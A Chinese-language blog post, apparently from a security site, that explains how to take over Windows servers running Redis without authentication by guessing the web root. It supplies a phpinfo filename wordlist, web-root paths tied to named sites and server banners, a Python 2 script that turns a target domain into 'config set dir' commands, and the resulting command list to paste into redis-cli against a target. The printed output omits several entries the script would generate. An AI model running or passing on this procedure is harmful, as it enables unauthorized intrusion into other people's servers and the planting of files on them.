有时候遇到Windows环境的Redis未授权很蛋疼,不能像Linux一样写计划任务和私钥直接获取服务器权限,所以特意收集了100+的phpinfo路径,写成脚本自动生成网站绝对路径(只限Windows,Linux收集的不够多),方便猜解。

绝对路径也可以扫旁站的phpinfo路径或404报错获得,这里是一些phpinfo的字典,用7kb大哥的7kbscan-WebPathBrute工具就可以批量检测了:

phpinfo.php
info.php
phpversion.php
test1.php
test.php
test2.php
phpinfo1.php
info1.php
x.php
xx.php
xxx.php
tz.php
env.php
p.php
aspcheck.asp
pi.php
i.php
l.php
1.php
php.php
pi.php
tz/tz.php
tst.php

还有一些网站使用集成套件搭建的,可以浏览器审查元素观察Server头来区分,这里也有一些字典:

phpstudy/xampp/wamp2集成环境:
C:/phpStudy/PHPTutorial/WWW
E:\wamp64\www\sowosky\                                Apache/2.4.27 (Win64) PHP/5.6.31
D:/phpStudy/WWW/                                                Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.3.29
D:/phpStudy/WWW/                                                Apache/2.4.23 (Win32) OpenSSL/1.0.2j
D:/phpStudy/WWW/dl/public/                                Apache/2.4.10 (Win32) OpenSSL/0.9.8zb mod_fcgid/2.3.9
D:/phpStudy/WWW/satcm2018/                                Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
D:\WEB_51TTYY\WWW\                
D:/web/WWW/                                                        Apache/2.4.10 (Win32) OpenSSL/0.9.8zb mod_fcgid/2.3.9
D:/wwwroot/www.zhongguanjiaoshi.com/                Apache/2.4.27 (Win32) OpenSSL/1.0.2l mod_fcgid/2.3.9
D:/www/gxqzxw/                                                Apache/2.4.25 (Win64) OpenSSL/1.0.2k
D:/WWW/                                                            Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
D:/wwwroot/xlsly/                                                Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
E:\chinwin\                
E:/phpStudy/WWW/                                                Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
E:/wamp2/wamp/www/lw/                                        Apache/2.2.11 (Win32) PHP/5.2.9-2
E:/xampp/htdocs/                                                Apache/2.4.26 (Win32) OpenSSL/1.0.2l PHP/5.6.31
D:/web/renfangwang/                                        Apache/2.4.9 (Win64) PHP/5.5.12

绝对路径生成脚本:

#coding:utf-8

realdomain = 'bbs.sloot.net'  #域名
pre = 'd:/'  #初始磁盘

www1 = realdomain.split('.') #按'.'来切割
wwwlen = len(www1)
topdomainnopoint = ''
for i in range(1, wwwlen):
    topdomainnopoint += www1[i]

domainnopoint = realdomain.replace('.', '')
topdomainnopoint = topdomainnopoint
topdomain = realdomain.split('.', 1)[-1]
hosthead = www1[0]
domaincenter = www1[1]
domainunderline = realdomain.replace('.', '_')
topdomainunderline = topdomain.replace('.', '_')

l1 = ['www','wwroot','wwwroot','wwwroot1','web','website','webdata','webroot','websoft','html','site','sites','project','http','htdocs','myweb','wz','wangzhan','app','AppFile','public','public_html','hws_web','host','Hosting','default','phpStudy','PHPTutorial','wamp64','wamp2','wamp','xampp','Inetpub','apache','apache2','data','virtualhost','WebSiteIng','vhost','freehost','webhosting','clients','cn','en','zh','web2018','soft','code','LocalUser','vhosts','httpdocs','IIS','HwsHostMaster','phpweb','usr','test','home','Application','robotsite', 'HostingSpaces', 'WebSites']
l2 = [realdomain,domainnopoint,topdomainnopoint,topdomain,hosthead,domaincenter,domainunderline,topdomainunderline]
l1.extend(l2)

for i in l1:
    print 'config set dir '+pre+i

最终生成的路径

config set dir d:/www
config set dir d:/wwwroot
config set dir d:/wwwroot1
config set dir d:/web
config set dir d:/website
config set dir d:/webdata
config set dir d:/webroot
config set dir d:/websoft
config set dir d:/html
config set dir d:/site
config set dir d:/sites
config set dir d:/project
config set dir d:/http
config set dir d:/htdocs
config set dir d:/myweb
config set dir d:/wz
config set dir d:/wangzhan
config set dir d:/app
config set dir d:/AppFile
config set dir d:/public
config set dir d:/public_html
config set dir d:/hws_web
config set dir d:/host
config set dir d:/Hosting
config set dir d:/default
config set dir d:/phpStudy
config set dir d:/PHPTutorial
config set dir d:/wamp64
config set dir d:/wamp2
config set dir d:/wamp
config set dir d:/xampp
config set dir d:/Inetpub
config set dir d:/apache
config set dir d:/apache2
config set dir d:/data
config set dir d:/virtualhost
config set dir d:/WebSiteIng
config set dir d:/vhost
config set dir d:/freehost
config set dir d:/webhosting
config set dir d:/clients
config set dir d:/cn
config set dir d:/en
config set dir d:/zh
config set dir d:/web2018
config set dir d:/soft
config set dir d:/code
config set dir d:/bbs.sloot.net
config set dir d:/bbsslootnet
config set dir d:/slootnet
config set dir d:/sloot.net
config set dir d:/bbs
config set dir d:/sloot
config set dir d:/bbs_sloot_net
config set dir d:/sloot_net

然后,在windows下用redis-cli -h ip 连接后全部复制上面生成的路径,去批量的测试,在windows下会每行逐个执行,但在linux下不会。

标签: none

添加新评论